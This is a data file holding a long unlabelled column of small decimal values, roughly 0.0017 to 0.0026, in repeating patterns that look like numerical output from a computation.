0.00179139
0.0017877
0.00178746
0.00178245
0.00177846
0.00178265
0.00177856
0.00178251
0.00178263
0.00177869
0.00178256
0.00178221
0.00177871
0.00177871
0.00178242
0.00178242
0.00177853
0.00175384
0.00175384
0.00174492
0.00174492
0.00174493
0.00174492
0.00175384
0.00175384
0.00175384
0.00174492
0.00174493
0.00174493
0.00174492
0.00175384
0.00175384
0.00175384
0.00174492
0.00174492
0.00174492
0.00174492
0.00175384
0.00173602
0.00172713
0.00172714
0.00173602
0.00173603
0.00173602
0.00172713
0.00173602
0.00172714
0.00172713
0.00173603
0.00173602
0.00173602
0.00172713
0.00173602
0.00172714
0.00172714
0.00173603
0.00173603
0.00173602
0.00172713
0.00173602
0.00172713
0.00172714
0.00173602
0.00173602
0.00173602
0.00172713
0.00174666
0.00174686
0.00174276
0.001743
0.00174686
0.00174667
0.00174299
0.00175188
0.00175567
0.00175579
0.0017516
0.00175561
0.00175175
0.00175165
0.00175191
0.00175169
0.00175578
0.00175558
0.00175558
0.00175168
0.00175191
0.00174669
0.00174274
0.00174689
0.00174284
0.00174676
0.00174687
0.00174296
0.00174666
0.00174686
0.001743
0.00174276
0.00174667
0.00174686
0.001743
0.00175188
0.00175567
0.00175579
0.0017516
0.00175561
0.00175175
0.00175165
0.00175191
0.00175169
0.00175559
0.00175578
0.00175558
0.00175192
0.00175168
0.00174669
0.00174274
0.0017469
0.00174284
0.00174676
0.00174687
0.00174296
0.00174681
0.00174645
0.00174298
0.00174298
0.00174667
0.00174667
0.00174281
0.00171826
0.00171826
0.00170939
0.00170939
0.00170939
0.00170939
0.00171825
0.00171826
0.00171826
0.00170939
0.00170939
0.00170939
0.00170939
0.00171825
0.00171826
0.00171826
0.00170939
0.00170939
0.00170939
0.00170939
0.00171825
0.00170053
0.00169168
0.00169169
0.00170053
0.00170053
0.00170053
0.00169168
0.00170053
0.00169169
0.00169168
0.00170053
0.00170053
0.00170053
0.00169168
0.00170053
0.00169169
0.00169168
0.00170053
0.00170053
0.00170053
0.00169168
0.00170053
0.00169168
0.00169168
0.00170053
0.00170053
0.00170053
0.00169168
0.00171112
0.00171133
0.00170724
0.00170748
0.00171132
0.00171113
0.00170747
0.0017163
0.00172009
0.0017202
0.00171604
0.00172002
0.00171619
0.00171608
0.00171634
0.00171612
0.00172019
0.00172
0.00171999
0.00171611
0.00171635
0.00171115
0.00170722
0.00171136
0.00170733
0.00171122
0.00171134
0.00170744
0.00171113
0.00171132
0.00170749
0.00170725
0.00171114
0.00171132
0.00170748
0.00171631
0.00172009
0.0017202
0.00171604
0.00172002
0.00171619
0.00171609
0.00171635
0.00171612
0.00172
0.00172018
0.00171999
0.00171635
0.00171611
0.00171116
0.00170722
0.00171137
0.00170733
0.00171123
0.00171134
0.00170745
0.00171127
0.00171092
0.00170747
0.00170747
0.00171113
0.00171114
0.00170729
0.00168284
0.00168284
0.00167401
0.00167401
0.00167401
0.001674
0.00168284
0.00168285
0.00168284
0.00167401
0.00167401
0.00167401
0.001674
0.00168284
0.00168284
0.00168284
0.00167401
0.00167401
0.00167401
0.001674
0.00168284
0.00166519
0.00166518
0.00166518
0.00166518
0.00167575
0.00167595
0.00167189
0.00167212
0.00167595
0.00167576
0.00167212
0.00168091
0.00168468
0.00168479
0.00168065
0.00168461
0.0016808
0.00168069
0.00168095
0.00168072
0.00168478
0.00168459
0.00168458
0.00168071
0.00168095
0.00167578
0.00167187
0.00167599
0.00167197
0.00167585
0.00167596
0.00167209
0.00167575
0.00167595
0.00167213
0.0016719
0.00167576
0.00167596
0.00167212
0.00168092
0.00168469
0.0016848
0.00168066
0.00168462
0.00168081
0.0016807
0.00168095
0.00168073
0.00168459
0.00168479
0.00168459
0.00168095
0.00168072
0.00167579
0.00167187
0.001676
0.00167198
0.00167586
0.00167597
0.00167209
0.00167591
0.00167554
0.00167211
0.00167211
0.00167577
0.00167577
0.00167194
0.002575
0.00257478
0.00257086
0.00257086
0.00257075
0.00257491
0.00257491
0.00256088
0.00256129
0.00256503
0.00256503
0.00256513
0.002561
0.002561
0.002575
0.0025707
0.00257089
0.00257514
0.00257511
0.00257501
0.00257089
0.00258075
0.00258492
0.00258043
0.00258498
0.00258052
0.00258057
0.00258491
0.00257502
0.00257063
0.00257508
0.00257067
0.00257509
0.00257502
0.00257086
0.00258077
0.00258063
0.002585
0.0025849
0.00258059
0.00258077
0.00258489
0.002575
0.0025707
0.00257089
0.00257514
0.00257511
0.00257501
0.00257089
0.00258074
0.00258491
0.00258042
0.00258498
0.00258052
0.00258056
0.0025849
0.00257502
0.00257064
0.00257508
0.00257067
0.00257509
0.00257086
0.00257502
0.00258076
0.00258063
0.002585
0.0025849
0.00258059
0.00258077
0.00258489
0.00256102
0.00256524
0.00256514
0.00256088
0.00256513
0.00256083
0.00256102
0.00255529
0.00255095
0.00255534
0.00255091
0.00255529
0.00255535
0.00255115
0.002561
0.00256521
0.00256515
0.00256067
0.00256081
0.00256514
0.00256077
0.00255527
0.0025554
0.00255097
0.00255117
0.00255538
0.00255528
0.00255117
0.00256102
0.00256524
0.00256514
0.00256088
0.00256513
0.00256083
0.00256102
0.00255529
0.00255096
0.00255535
0.00255091
0.00255536
0.00255529
0.00255115
0.002561
0.00256522
0.00256515
0.00256067
0.00256514
0.00256077
0.00256081
0.00255527
0.0025554
0.00255097
0.00255117
0.00255538
0.00255528
0.00255117
0.002575
0.00257478
0.00257087
0.00257087
0.00257491
0.00257491
0.00257075
0.00256088
0.00256129
0.00256504
0.00256504
0.002561
0.00256513
0.002561
0.002575
0.0025707
0.00257089
0.00257513
0.00257511
0.00257501
0.00257088
0.00258074
0.0025849
0.00258041
0.00258498
0.00258052
0.00258054
0.0025849
0.00257502
0.00257064
0.00257508
0.00257067
0.00257509
0.00257502
0.00257086
0.00258076
0.00258063
0.002585
0.0025849
0.00258059
0.00258077
0.00258489
0.002575
0.00257089
0.0025707
0.00257513
0.00257501
0.00257511
0.00257088
0.00258074
0.00258491
0.00258042
0.00258498
0.00258052
0.00258056
0.0025849
0.00257502
0.00257064
0.00257508
0.00257067
0.00257509
0.00257086
0.00257502
0.00258076
0.00258063
0.0025849
0.002585
0.00258077
0.00258059
0.00258489
0.00256102
0.00256524
0.00256514
0.00256088
0.00256513
0.00256083
0.00256102
0.00255529
0.00255096
0.00255535
0.00255091
0.00255529
0.00255535
0.00255115
0.002561
0.00256521
0.00256515
0.00256067
0.00256081
0.00256514
0.00256077
0.00255527
0.0025554
0.00255098
0.00255117
0.00255538
0.00255528
0.00255117
0.00256102
0.00256514
0.00256524
0.00256088
0.00256513
0.00256102
0.00256083
0.00255529
0.00255096
0.00255535
0.00255091
0.00255536
0.00255529
0.00255115
0.002561
0.00256522
0.00256515
0.00256067
0.00256514
0.00256077
0.00256081
0.00255527
0.0025554
0.00255117
0.00255097
0.00255528
0.00255538
0.00255117
0.002575
0.00257089
0.0025707
0.00257513
0.00257501
0.00257511
0.00257088
0.00258074
0.00258491
0.00258042
0.00258498
0.00258056
0.00258052
0.0025849
0.00257502
0.00257064
0.00257508
0.00257067
0.00257502
0.00257509
0.00257086
0.00258076
0.00258063
0.0025849
0.002585
0.00258077
0.00258059
0.00258489
0.00256102
0.00256524
0.00256514
0.00256088
0.00256513
0.00256083
0.00256102
0.00255529
0.00255096
0.00255535
0.00255091
0.00255115
0.00255529
0.00255536
0.002561
0.00256521
0.00256515
0.00256067
0.00256514
0.00256081
0.00256077
0.00255527
0.0025554
0.00255098
0.00255117
0.00255117
0.00255538
0.00255528
0.00256102
0.00256514
0.00256524
0.00256088
0.00256513
0.00256102
0.00256083
0.00255529
0.00255095
0.00255535
0.00255091
0.00255536
0.00255529
0.00255115
0.002561
0.00256521
0.00256515
0.00256067
0.00256514
0.00256077
0.00256081
0.00255527
0.0025554
0.00255117
0.00255098
0.00255528
0.00255538
0.00255117
0.002575
0.00257478
0.00257087
0.00257086
0.00257491
0.00257491
0.00257075
0.00256088
0.00256129
0.00256504
0.00256504
0.002561
0.00256513
0.002561
0.002575
0.00257089
0.0025707
0.00257513
0.00257501
0.00257511
0.00257089
0.00258074
0.00258491
0.00258042
0.00258498
0.00258055
0.00258052
0.0025849
0.00257502
0.00257063
0.00257508
0.00257067
0.00257502
0.00257509
0.00257086
0.00258076
0.00258063
0.0025849
0.002585
0.00258077
0.00258059
0.00258489
0.00256102
0.00256514
0.00256524
0.00256088
0.00256513
0.00256102
0.00256083
0.00255529
0.00255096
0.00255535
0.00255091
0.00255115
0.00255529
0.00255536
0.002561
0.00256521
0.00256515
0.00256067
0.00256514
0.00256081
0.00256077
0.00255527
0.0025554
0.00255117
0.00255097
0.00255117
0.00255528
0.00255538
0.00256102
0.00256514
0.00256524
0.00256088
0.00256513
0.00256102
0.00256083
0.00255529
0.00255095
0.00255535
0.00255091
0.00255536
0.00255529
0.00255115
0.002561
0.00256521
0.00256515
0.00256067
0.00256514
0.00256077
0.00256081
0.00255527
0.0025554
0.00255117
0.00255097
0.00255528
0.00255538
0.00255117
0.00256088
0.00256129
0.00256504
0.00256504
0.00256513
0.002561
0.002561
0.00253559
0.00253538
0.00253149
0.00253148
0.00253135
0.0025355
0.0025355
0.00252154
0.00252198
0.00252568
0.00252568
0.00252577
0.00252168
0.00252167
0.0025356
0.00253572
0.0025313
0.00253152
0.0025357
0.00253561
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254107
0.00254544
0.00254111
0.00254133
0.00254118
0.00254553
0.00254544
0.00254113
0.00254543
0.00254134
0.00253561
0.00253124
0.00253567
0.00253129
0.00253568
0.00253561
0.00253148
0.0025356
0.00253572
0.0025313
0.00253152
0.0025357
0.00253561
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254544
0.00254107
0.00254112
0.00254133
0.00254118
0.00254553
0.00254544
0.00254543
0.00254113
0.00254134
0.00253561
0.00253124
0.00253567
0.00253129
0.00253568
0.00253149
0.00253561
0.0025217
0.00252588
0.00252579
0.00252153
0.00252578
0.00252149
0.00252171
0.00251599
0.00251168
0.00251605
0.00251163
0.00251599
0.00251606
0.00251188
0.00252168
0.00252586
0.00252579
0.00252134
0.00252148
0.00252579
0.00252143
0.00251598
0.00251609
0.00251169
0.00251192
0.00251607
0.00251599
0.00251191
0.0025217
0.00252588
0.00252579
0.00252153
0.00252578
0.00252149
0.00252171
0.00251599
0.00251168
0.00251605
0.00251163
0.00251606
0.00251599
0.00251188
0.00252168
0.00252586
0.0025258
0.00252134
0.00252579
0.00252143
0.00252148
0.00251598
0.00251609
0.00251169
0.00251192
0.00251607
0.00251599
0.00251191
0.00253559
0.00253538
0.00253148
0.00253148
0.0025355
0.0025355
0.00253135
0.00252154
0.00252198
0.00252569
0.00252569
0.00252168
0.00252577
0.00252168
0.0025356
0.00253572
0.0025313
0.00253151
0.0025357
0.00253561
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254107
0.00254544
0.00254112
0.00254133
0.00254118
0.00254553
0.00254544
0.00254113
0.00254543
0.00254134
0.00253561
0.00253124
0.00253567
0.00253129
0.00253568
0.00253561
0.00253149
0.0025356
0.00253572
0.00253152
0.0025313
0.00253561
0.0025357
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254544
0.00254107
0.00254112
0.00254133
0.00254118
0.00254544
0.00254553
0.00254543
0.00254134
0.00254113
0.00253561
0.00253124
0.00253567
0.00253129
0.00253568
0.00253149
0.00253561
0.0025217
0.00252588
0.00252579
0.00252153
0.00252578
0.00252149
0.00252171
0.00251599
0.00251168
0.00251605
0.00251163
0.00251599
0.00251606
0.00251188
0.00252168
0.00252586
0.00252579
0.00252134
0.00252148
0.00252579
0.00252143
0.00251598
0.00251609
0.00251169
0.00251191
0.00251607
0.00251599
0.00251191
0.0025217
0.00252579
0.00252588
0.00252153
0.00252578
0.00252171
0.00252149
0.00251599
0.00251168
0.00251605
0.00251163
0.00251606
0.00251599
0.00251188
0.00252168
0.00252586
0.00252579
0.00252134
0.00252579
0.00252143
0.00252148
0.00251598
0.00251609
0.00251192
0.00251169
0.00251599
0.00251607
0.00251191
0.0025356
0.00253572
0.00253151
0.00253131
0.00253561
0.0025357
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254112
0.00254544
0.00254107
0.00254133
0.00254118
0.00254544
0.00254553
0.00254134
0.00254543
0.00254113
0.00253561
0.00253124
0.00253567
0.00253129
0.00253561
0.00253568
0.00253149
0.0025217
0.00252588
0.00252579
0.00252153
0.00252578
0.00252149
0.00252171
0.00251599
0.00251168
0.00251605
0.00251163
0.00251188
0.00251599
0.00251606
0.00252168
0.00252586
0.00252579
0.00252134
0.00252579
0.00252148
0.00252143
0.00251598
0.00251609
0.00251169
0.00251192
0.00251191
0.00251607
0.00251599
0.0025217
0.00252579
0.00252588
0.00252153
0.00252578
0.00252171
0.00252149
0.00251599
0.00251168
0.00251605
0.00251163
0.00251606
0.00251599
0.00251188
0.00252168
0.00252586
0.00252579
0.00252134
0.00252579
0.00252143
0.00252148
0.00251598
0.00251609
0.00251192
0.00251169
0.00251599
0.00251607
0.00251191
0.00253559
0.00253538
0.00253148
0.00253148
0.0025355
0.0025355
0.00253135
0.00252154
0.00252198
0.00252568
0.00252568
0.00252168
0.00252577
0.00252167
0.0025356
0.00253572
0.00253152
0.0025313
0.00253561
0.0025357
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254112
0.00254544
0.00254107
0.00254133
0.00254118
0.00254544
0.00254553
0.00254134
0.00254543
0.00254113
0.00253561
0.00253124
0.00253567
0.00253129
0.00253561
0.00253568
0.00253149
0.0025217
0.00252579
0.00252588
0.00252153
0.00252578
0.00252171
0.00252149
0.00251599
0.00251168
0.00251605
0.00251163
0.00251188
0.00251599
0.00251606
0.00252168
0.00252586
0.0025258
0.00252134
0.00252579
0.00252148
0.00252143
0.00251598
0.00251609
0.00251192
0.00251169
0.00251191
0.00251599
0.00251607
0.0025217
0.00252579
0.00252588
0.00252153
0.00252578
0.00252171
0.00252149
0.00251599
0.00251168
0.00251605
0.00251163
0.00251606
0.00251599
0.00251188
0.00252168
0.00252586
0.0025258
0.00252134
0.00252579
0.00252143
0.00252148
0.00251598
0.00251609
0.00251192
0.00251169
0.00251599
0.00251607
0.00251191
0.00252154
0.00252198
0.00252568
0.00252568
0.00252577
0.00252167
0.00252167
0.0024964
0.00249619
0.00249233
0.00249232
0.00249217
0.00249632
0.00249632
0.00248241
0.00248288
0.00248655
0.00248655
0.00248664
0.00248257
0.00248257
0.00249641
0.00249652
0.00249213
0.00249237
0.00249651
0.00249643
0.00249235
0.00250209
0.0025062
0.00250627
0.00250176
0.00250185
0.0025062
0.0025019
0.00250212
0.00250194
0.00250628
0.0025062
0.0025019
0.00250619
0.00250214
0.00249642
0.00249207
0.00249649
0.00249213
0.00249649
0.00249642
0.00249233
0.00249641
0.00249652
0.00249213
0.00249237
0.0024965
0.00249643
0.00249236
0.0025021
0.0025062
0.00250627
0.00250176
0.0025062
0.00250185
0.0025019
0.00250212
0.00250194
0.00250628
0.0025062
0.00250619
0.0025019
0.00250214
0.00249642
0.00249207
0.00249649
0.00249213
0.00249649
0.00249233
0.00249643
0.0024826
0.00248674
0.00248666
0.0024824
0.00248665
0.00248237
0.00248261
0.00247691
0.00247263
0.00247697
0.00247257
0.00247691
0.00247698
0.00247282
0.00248257
0.00248673
0.00248666
0.00248223
0.00248237
0.00248666
0.00248231
0.0024769
0.002477
0.00247262
0.00247287
0.00247699
0.00247692
0.00247285
0.0024826
0.00248674
0.00248666
0.0024824
0.00248665
0.00248237
0.00248261
0.00247691
0.00247263
0.00247697
0.00247256
0.00247698
0.00247691
0.00247283
0.00248257
0.00248673
0.00248666
0.00248223
0.00248666
0.00248231
0.00248237
0.0024769
0.00247701
0.00247262
0.00247287
0.00247699
0.00247692
0.00247286
0.0024964
0.00249619
0.00249233
0.00249232
0.00249632
0.00249632
0.00249217
0.00248241
0.00248288
0.00248655
0.00248655
0.00248257
0.00248664
0.00248257
0.00249641
0.00249652
0.00249213
0.00249237
0.0024965
0.00249643
0.00249235
0.0025021
0.0025062
0.00250627
0.00250176
0.00250184
0.0025062
0.0025019
0.00250212
0.00250194
0.00250628
0.0025062
0.0025019
0.00250619
0.00250214
0.00249642
0.00249207
0.00249649
0.00249213
0.00249649
0.00249642
0.00249233
0.00249641
0.00249652
0.00249237
0.00249213
0.00249643
0.0024965
0.00249235
0.0025021
0.0025062
0.00250627
0.00250176
0.0025062
0.00250185
0.0025019
0.00250212
0.00250194
0.0025062
0.00250628
0.00250619
0.00250214
0.0025019
0.00249642
0.00249207
0.00249648
0.00249213
0.00249649
0.00249233
0.00249642
0.0024826
0.00248674
0.00248666
0.0024824
0.00248665
0.00248237
0.00248261
0.00247691
0.00247263
0.00247697
0.00247256
0.00247691
0.00247698
0.00247282
0.00248257
0.00248673
0.00248666
0.00248223
0.00248237
0.00248666
0.00248231
0.0024769
0.00247701
0.00247262
0.00247287
0.00247699
0.00247692
0.00247285
0.0024826
0.00248666
0.00248674
0.0024824
0.00248665
0.00248261
0.00248237
0.00247691
0.00247263
0.00247697
0.00247256
0.00247698
0.00247691
0.00247282
0.00248257
0.00248673
0.00248666
0.00248223
0.00248666
0.00248231
0.00248237
0.0024769
0.00247701
0.00247287
0.00247262
0.00247691
0.00247699
0.00247285
0.00249641
0.00249652
0.00249237
0.00249213
0.00249643
0.0024965
0.00249235
0.00250209
0.0025062
0.00250627
0.00250176
0.0025019
0.0025062
0.00250185
0.00250212
0.00250194
0.0025062
0.00250628
0.00250213
0.00250619
0.0025019
0.00249642
0.00249207
0.00249649
0.00249213
0.00249642
0.00249649
0.00249232
0.0024826
0.00248674
0.00248666
0.0024824
0.00248665
0.00248237
0.00248261
0.00247691
0.00247263
0.00247697
0.00247256
0.00247283
0.00247691
0.00247698
0.00248257
0.00248673
0.00248666
0.00248222
0.00248666
0.00248237
0.00248231
0.0024769
0.00247701
0.00247262
0.00247287
0.00247286
0.00247699
0.00247692
0.0024826
0.00248666
0.00248674
0.0024824
0.00248665
0.00248261
0.00248237
0.00247691
0.00247263
0.00247697
0.00247256
0.00247698
0.00247691
0.00247282
0.00248257
0.00248673
0.00248666
0.00248223
0.00248666
0.00248231
0.00248237
0.0024769
0.00247701
0.00247287
0.00247262
0.00247692
0.00247699
0.00247285
0.0024964
0.00249619
0.00249233
0.00249232
0.00249632
0.00249632
0.00249217
0.00248241
0.00248287
0.00248655
0.00248655
0.00248257
0.00248664
0.00248257
0.00249641
0.00249652
0.00249237
0.00249213
0.00249643
0.0024965
0.00249235
0.0025021
0.0025062
0.00250627
0.00250176
0.0025019
0.0025062
0.00250184
0.00250212
0.00250194
0.0025062
0.00250628
0.00250214
0.00250619
0.0025019
0.00249642
0.00249207
0.00249648
0.00249213
0.00249643
0.00249649
0.00249233
0.0024826
0.00248666
0.00248674
0.0024824
0.00248665
0.00248261
0.00248237
0.00247691
0.00247263
0.00247697
0.00247256
0.00247282
0.00247691
0.00247698
0.00248257
0.00248673
0.00248666
0.00248223
0.00248666
0.00248237
0.00248231
0.0024769
0.002477
0.00247287
0.00247262
0.00247285
0.00247692
0.00247699
0.0024826
0.00248666
0.00248674
0.0024824
0.00248665
0.00248261
0.00248237
0.00247691
0.00247263
0.00247697
0.00247256
0.00247698
0.00247691
0.00247282
0.00248257
0.00248673
0.00248666
0.00248222
0.00248666
0.00248231
0.00248237
0.0024769
0.002477
0.00247287
0.00247262
0.00247692
0.00247699
0.00247285
0.00248241
0.00248288
0.00248655
0.00248655
0.00248664
0.00248257
0.00248257
0.00245743
0.00245722
0.00245338
0.00245337
0.00245321
0.00245734
0.00245734
0.0024435
0.00244398
0.00244763
0.00244763
0.00244772
0.00244367
0.00244367
0.00245744
0.00245754
0.00245316
0.00245342
0.00245753
0.00245745
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.00246283
0.00246717
0.00246289
0.00246312
0.00246292
0.00246725
0.00246718
0.00246289
0.00246716
0.00246314
0.00245745
0.00245311
0.00245751
0.00245318
0.00245752
0.00245745
0.00245337
0.00245744
0.00245754
0.00245316
0.00245342
0.00245753
0.00245745
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.00246717
0.00246283
0.0024629
0.00246312
0.00246292
0.00246725
0.00246718
0.00246716
0.00246289
0.00246314
0.00245745
0.00245311
0.00245751
0.00245318
0.00245752
0.00245338
0.00245745
0.0024437
0.00244781
0.00244774
0.00244349
0.00244773
0.00244346
0.00244372
0.00243804
0.00243378
0.0024381
0.00243371
0.00243804
0.00243811
0.00243397
0.00244367
0.0024478
0.00244774
0.00244331
0.00244347
0.00244774
0.0024434
0.00243803
0.00243813
0.00243376
0.00243403
0.00243811
0.00243805
0.00243401
0.0024437
0.00244782
0.00244774
0.00244349
0.00244773
0.00244346
0.00244372
0.00243804
0.00243378
0.0024381
0.00243371
0.00243811
0.00243804
0.00243398
0.00244367
0.00244781
0.00244774
0.00244332
0.00244774
0.0024434
0.00244347
0.00243803
0.00243813
0.00243376
0.00243403
0.00243811
0.00243805
0.00243401
0.00245743
0.00245722
0.00245337
0.00245337
0.00245734
0.00245734
0.00245321
0.0024435
0.00244398
0.00244763
0.00244763
0.00244367
0.00244772
0.00244367
0.00245744
0.00245754
0.00245316
0.00245342
0.00245753
0.00245745
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.00246283
0.00246717
0.0024629
0.00246312
0.00246292
0.00246725
0.00246718
0.00246289
0.00246716
0.00246314
0.00245745
0.00245311
0.00245751
0.00245318
0.00245752
0.00245745
0.00245337
0.00245744
0.00245754
0.00245342
0.00245316
0.00245745
0.00245753
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.00246717
0.00246283
0.0024629
0.00246312
0.00246292
0.00246718
0.00246725
0.00246716
0.00246314
0.00246289
0.00245745
0.00245311
0.00245751
0.00245318
0.00245752
0.00245337
0.00245745
0.0024437
0.00244781
0.00244774
0.00244349
0.00244773
0.00244346
0.00244372
0.00243804
0.00243378
0.0024381
0.0024337
0.00243804
0.00243811
0.00243397
0.00244367
0.0024478
0.00244774
0.00244331
0.00244347
0.00244774
0.0024434
0.00243803
0.00243813
0.00243376
0.00243403
0.00243811
0.00243804
0.00243401
0.0024437
0.00244774
0.00244781
0.00244349
0.00244773
0.00244372
0.00244346
0.00243804
0.00243378
0.0024381
0.0024337
0.00243811
0.00243804
0.00243398
0.00244367
0.0024478
0.00244774
0.00244331
0.00244774
0.0024434
0.00244347
0.00243803
0.00243813
0.00243403
0.00243376
0.00243804
0.00243811
0.00243401
0.00245744
0.00245754
0.00245342
0.00245316
0.00245745
0.00245753
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.0024629
0.00246717
0.00246283
0.00246312
0.00246292
0.00246718
0.00246725
0.00246314
0.00246716
0.00246289
0.00245745
0.00245311
0.00245751
0.00245318
0.00245745
0.00245752
0.00245337
0.0024437
0.00244782
0.00244774
0.00244349
0.00244773
0.00244346
0.00244372
0.00243804
0.00243378
0.0024381
0.00243371
0.00243398
0.00243804
0.00243811
0.00244367
0.0024478
0.00244774
0.00244331
0.00244774
0.00244347
0.0024434
0.00243803
0.00243813
0.00243376
0.00243403
0.00243401
0.00243811
0.00243804
0.0024437
0.00244774
0.00244781
0.00244349
0.00244773
0.00244372
0.00244346
0.00243804
0.00243378
0.0024381
0.0024337
0.00243811
0.00243804
0.00243397
0.00244367
0.0024478
0.00244774
0.00244331
0.00244774
0.0024434
0.00244347
0.00243803
0.00243813
0.00243403
0.00243376
0.00243804
0.00243811
0.00243401
0.00245743
0.00245722
0.00245337
0.00245337
0.00245734
0.00245734
0.00245321
0.0024435
0.00244398
0.00244763
0.00244763
0.00244367
0.00244772
0.00244367
0.00245744
0.00245754
0.00245342
0.00245316
0.00245745
0.00245753
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.0024629
0.00246717
0.00246283
0.00246312
0.00246292
0.00246718
0.00246725
0.00246314
0.00246716
0.00246288
0.00245745
0.00245311
0.00245751
0.00245318
0.00245745
0.00245752
0.00245337
0.0024437
0.00244774
0.00244781
0.00244349
0.00244773
0.00244372
0.00244346
0.00243804
0.00243378
0.0024381
0.0024337
0.00243398
0.00243804
0.0024381
0.00244367
0.0024478
0.00244774
0.00244331
0.00244774
0.00244347
0.0024434
0.00243803
0.00243813
0.00243403
0.00243376
0.00243401
0.00243804
0.00243811
0.0024437
0.00244774
0.00244781
0.00244349
0.00244773
0.00244372
0.00244346
0.00243804
0.00243378
0.0024381
0.0024337
0.00243811
0.00243804
0.00243398
0.00244367
0.0024478
0.00244774
0.00244331
0.00244774
0.0024434
0.00244348
0.00243803
0.00243813
0.00243403
0.00243376
0.00243804
0.00243812
0.00243401
0.0024435
0.00244398
0.00244763
0.00244763
0.00244772
0.00244367
0.00244367
0.00241866
0.00241845
0.00241463
0.00241462
0.00241446
0.00241857
0.00241857
0.0024048
0.00240529
0.00240891
0.00240891
0.002409
0.00240497
0.00240497
0.00241867
0.00241877
0.00241441
0.00241468
0.00241875
0.00241869
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.00242402
0.00242835
0.0024241
0.00242433
0.00242411
0.00242843
0.00242836
0.00242408
0.00242834
0.00242435
0.00241868
0.00241435
0.00241874
0.00241443
0.00241874
0.00241868
0.00241462
0.00241867
0.00241877
0.00241441
0.00241468
0.00241875
0.00241869
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.00242835
0.00242402
0.0024241
0.00242433
0.00242411
0.00242843
0.00242836
0.00242834
0.00242408
0.00242435
0.00241868
0.00241435
0.00241874
0.00241443
0.00241875
0.00241463
0.00241868
0.002405
0.00240909
0.00240902
0.00240478
0.002409
0.00240475
0.00240502
0.00239937
0.00239513
0.00239943
0.00239505
0.00239937
0.00239944
0.00239532
0.00240497
0.00240908
0.00240902
0.00240461
0.00240477
0.00240902
0.00240469
0.00239935
0.00239946
0.0023951
0.00239538
0.00239944
0.00239937
0.00239536
0.002405
0.00240909
0.00240902
0.00240478
0.002409
0.00240475
0.00240502
0.00239937
0.00239513
0.00239944
0.00239505
0.00239944
0.00239937
0.00239532
0.00240497
0.00240908
0.00240902
0.00240461
0.00240902
0.0024047
0.00240478
0.00239935
0.00239946
0.0023951
0.00239538
0.00239944
0.00239937
0.00239536
0.00241866
0.00241845
0.00241463
0.00241463
0.00241857
0.00241857
0.00241445
0.00240479
0.00240529
0.00240891
0.00240891
0.00240497
0.002409
0.00240497
0.00241867
0.00241877
0.0024144
0.00241468
0.00241875
0.00241868
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.00242402
0.00242835
0.0024241
0.00242433
0.00242411
0.00242843
0.00242836
0.00242408
0.00242834
0.00242435
0.00241868
0.00241435
0.00241874
0.00241443
0.00241875
0.00241868
0.00241463
0.00241867
0.00241877
0.00241468
0.00241441
0.00241868
0.00241875
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.00242835
0.00242402
0.0024241
0.00242433
0.00242411
0.00242836
0.00242843
0.00242834
0.00242435
0.00242408
0.00241868
0.00241435
0.00241874
0.00241443
0.00241875
0.00241463
0.00241868
0.002405
0.00240909
0.00240902
0.00240478
0.002409
0.00240475
0.00240502
0.00239937
0.00239513
0.00239943
0.00239505
0.00239937
0.00239944
0.00239532
0.00240497
0.00240909
0.00240902
0.00240461
0.00240478
0.00240902
0.00240469
0.00239935
0.00239946
0.0023951
0.00239538
0.00239944
0.00239937
0.00239536
0.002405
0.00240902
0.00240909
0.00240478
0.002409
0.00240502
0.00240475
0.00239937
0.00239513
0.00239943
0.00239505
0.00239944
0.00239937
0.00239532
0.00240497
0.00240909
0.00240902
0.00240461
0.00240902
0.00240469
0.00240478
0.00239935
0.00239946
0.00239538
0.0023951
0.00239937
0.00239944
0.00239536
0.00241867
0.00241877
0.00241468
0.00241441
0.00241868
0.00241876
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.0024241
0.00242835
0.00242402
0.00242433
0.00242411
0.00242836
0.00242843
0.00242435
0.00242834
0.00242408
0.00241868
0.00241435
0.00241874
0.00241443
0.00241868
0.00241875
0.00241462
0.002405
0.00240909
0.00240902
0.00240478
0.002409
0.00240475
0.00240502
0.00239937
0.00239513
0.00239943
0.00239505
0.00239532
0.00239937
0.00239944
0.00240497
0.00240908
0.00240902
0.00240461
0.00240902
0.00240478
0.0024047
0.00239935
0.00239946
0.0023951
0.00239538
0.00239536
0.00239944
0.00239937
0.002405
0.00240902
0.00240909
0.00240478
0.002409
0.00240502
0.00240475
0.00239937
0.00239513
0.00239943
0.00239505
0.00239944
0.00239937
0.00239532
0.00240497
0.00240909
0.00240902
0.00240461
0.00240902
0.00240469
0.00240477
0.00239935
0.00239946
0.00239538
0.0023951
0.00239937
0.00239944
0.00239536
0.00241866
0.00241845
0.00241463
0.00241462
0.00241857
0.00241857
0.00241445
0.00240479
0.00240529
0.00240891
0.00240891
0.00240497
0.002409
0.00240497
0.00241867
0.00241877
0.00241468
0.00241441
0.00241868
0.00241875
0.00241466
0.00242429
0.00242835
0.00242842
0.00242393
0.0024241
0.00242835
0.00242402
0.00242433
0.00242411
0.00242836
0.00242843
0.00242435
0.00242834
0.00242408
0.00241868
0.00241435
0.00241874
0.00241443
0.00241868
0.00241875
0.00241463
0.002405
0.00240902
0.00240909
0.00240478
0.002409
0.00240502
0.00240475
0.00239937
0.00239513
0.00239944
0.00239505
0.00239532
0.00239937
0.00239944
0.00240497
0.00240908
0.00240902
0.00240461
0.00240902
0.00240477
0.00240469
0.00239935
0.00239945
0.00239538
0.0023951
0.00239536
0.00239937
0.00239944
0.002405
0.00240902
0.00240909
0.00240478
0.002409
0.00240502
0.00240475
0.00239937
0.00239513
0.00239943
0.00239505
